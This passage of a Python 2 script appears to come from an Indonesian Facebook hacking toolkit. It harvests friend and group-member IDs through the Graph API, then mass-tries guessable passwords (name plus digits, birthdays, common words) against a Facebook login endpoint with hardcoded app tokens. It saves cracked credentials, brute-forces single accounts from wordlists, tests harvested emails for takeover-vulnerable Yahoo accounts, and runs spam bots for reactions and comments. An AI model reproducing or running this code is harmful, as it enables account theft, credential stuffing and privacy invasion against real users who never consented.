for b in berhasil:
print(b)
###CEK
for c in cekpoint:
print(c)
###Gagal
print 42*"\033[1;97m═"
print ("\033[31m[x] Failed \033[1;97m--> " + str(len(gagal)))
keluar()
############### SUPER MBF ################
def super():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;95m║--\033[1;91m> \033[1;96m1.\033[1;93m Crack with list friend"
print "\033[1;95m║--\033[1;91m> \033[1;96m2.\033[1;93m Crack from friend"
print "\033[1;95m║--\033[1;91m> \033[1;96m3.\033[1;93m Crack from member group"
print "\033[1;95m║--\033[1;91m> \033[1;96m0.\033[1;93m Back"
print "║"
pilih_super()
def pilih_super():
peak = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if peak =="":
print "\033[1;91m[!] Wrong input"
pilih_super()
elif peak =="1":
os.system('reset')
print logo
jalan('\033[1;94m[✺] \033[1;96mGet all friend id \033[1;95m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet all id from friend \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('reset')
print logo
idg=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong input"
pilih_super()
print "\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print 42*"\033[1;97m═"
##### crack #####
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
#Pass1
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass1+" =>"+z['name'])
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
#Pass2
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass2+" =>"+z['name'])
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
#Pass3
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass3+" =>"+z['name'])
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
#Pass4
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass4+" =>"+z['name'])
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
#Pass5
pass5 = "sayang123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass5+" =>"+z['name'])
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
#Pass6
pass6 = "kontol123"
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass6+" =>"+z['name'])
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
#Pass7
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name']+'doraemon321'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print("\033[1;93m[ \033[1;93mOK✓\033[1;93m ] "+user+" 😁 " +pass7+" =>"+z['name'])
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal OK/CP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;91m[+] \033[1;92mCP File saved \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
super()
######################################################
##### BRUTE FORCE #####
def brute():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
try:
email = raw_input("\033[1;91m[+] \033[1;92mID\033[1;97m/\033[1;92mEmail\033[1;97m/\033[1;92mHp \033[1;97mTarget \033[1;91m:\033[1;97m ")
passw = raw_input("\033[1;91m[+] \033[1;92mWordlist \033[1;97mext(list.txt) \033[1;91m: \033[1;97m")
total = open(passw,"r")
total = total.readlines()
print 42*"\033[1;97m═"
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mTarget \033[1;91m:\033[1;97m "+email
print "\033[1;91m[+] \033[1;92mTotal\033[1;96m "+str(len(total))+" \033[1;92mPassword"
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
sandi = open(passw,"r")
for pw in sandi:
try:
pw = pw.replace("\n","")
sys.stdout.write("\r\033[1;91m[\033[1;96m✸\033[1;91m] \033[1;92mCrack \033[1;91m: \033[1;97m"+pw)
sys.stdout.flush()
data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(email)+"&locale=en_US&password="+(pw)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open("Brute.txt", "w")
dapat.write(email+" | "+pw+"\n")
dapat.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
elif 'www.facebook.com' in mpsh["error_msg"]:
ceks = open("Brutecekpoint.txt", "w")
ceks.write(email+" | "+pw+"\n")
ceks.close()
print "\n\033[1;91m[+] \033[1;92mFound"
print 42*"\033[1;97m═"
print "\033[1;91m[!] \033[1;93mAccount Checkpoint"
print("\033[1;91m[➹] \033[1;92mUsername \033[1;91m:\033[1;97m "+email)
print("\033[1;91m[➹] \033[1;92mPassword \033[1;91m:\033[1;97m "+pw)
keluar()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
time.sleep(1)
except IOError:
print ("\033[1;91m[!] File not found")
tanyaw()
def tanyaw():
why = raw_input("\033[1;91m[?] \033[1;92mCreate wordlist ? \033[1;92m[y/n]\033[1;91m:\033[1;97m ")
if why =="":
print "\033[1;91m[!] Wrong"
tanyaw()
elif why =="y":
wordlist()
elif why =="Y":
wordlist()
elif why =="n":
menu_hack()
elif why =="N":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
tanyaw()
##### YAHOO CHECKER #####
#---------------------------------------------------#
def menu_yahoo():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m With list friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Clone from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Clone from member group"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Using file"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
yahoo_pilih()
#----pilih
def yahoo_pilih():
go = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if go =="":
print "\033[1;91m[!] Wrong"
yahoo_pilih()
elif go =="1":
yahoofriends()
elif go =="2":
yahoofromfriends()
elif go =="3":
yahoomember()
elif go =="4":
yahoolist()
elif go =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
yahoo_pilih()
##### LIST FRIEND #####
def yahoofriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mGetting email friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/MailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/MailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### CLONE FROM FRIEND #####
def yahoofromfriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/FriendMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FriendMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO MEMBER #####
def yahoomember():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from group \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/GrupMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO FILE #####
def yahoolist():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
files = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;91m[!] File not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
save = open('out/FileMailVuln.txt','w')
print 42*"\033[1;97m═"
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail)
berhasil.append(mail)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FileMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### MENU BOT #####
#----------------------------------------#
def menu_bot():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Bot Reactions Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Bot Reactions Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Bot Komen Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Bot Komen Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Mass delete Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Mass accept friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Mass delete friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
bot_pilih()
#////////////
def bot_pilih():
bots = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if bots =="":
print "\033[1;91m[!] Wrong input"
bot_pilih()
elif bots =="1":
menu_react()
elif bots =="2":
grup_react()
elif bots =="3":
bot_komen()
elif bots =="4":
grup_komen()
elif bots =="5":
deletepost()
elif bots =="6":
accept()
elif bots =="7":
unfriend()
elif bots =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
bot_pilih()
##### MENU REACT #####
def menu_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
react_pilih()
#//////////////
def react_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
react_pilih()
elif aksi =="1":
tipe = "LIKE"
react()
elif aksi =="2":
tipe = "LOVE"
react()
elif aksi =="3":
tipe = "WOW"
react()
elif aksi =="4":
tipe = "HAHA"
react()
elif aksi =="5":
tipe = "SAD"
react()
elif aksi =="6":
tipe = "ANGRY"
react()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
react_pilih()
#####NEXT
def react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Target \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
oh = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksi))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT REACT GRUP #####
def grup_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
reactg_pilih()
#//////////////
def reactg_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
reactg_pilih()
elif aksi =="1":
tipe = "LIKE"
reactg()
elif aksi =="2":
tipe = "LOVE"
reactg()
elif aksi =="3":
tipe = "WOW"
reactg()
elif aksi =="4":
tipe = "HAHA"
reactg()
elif aksi =="5":
tipe = "SAD"
reactg()
elif aksi =="6":
tipe = "ANGRY"
reactg()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
reactg_pilih()
#####NEXT
def reactg():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Group \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
grup_react()
try:
oh = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksigrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN #####
def bot_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Target \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
p = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
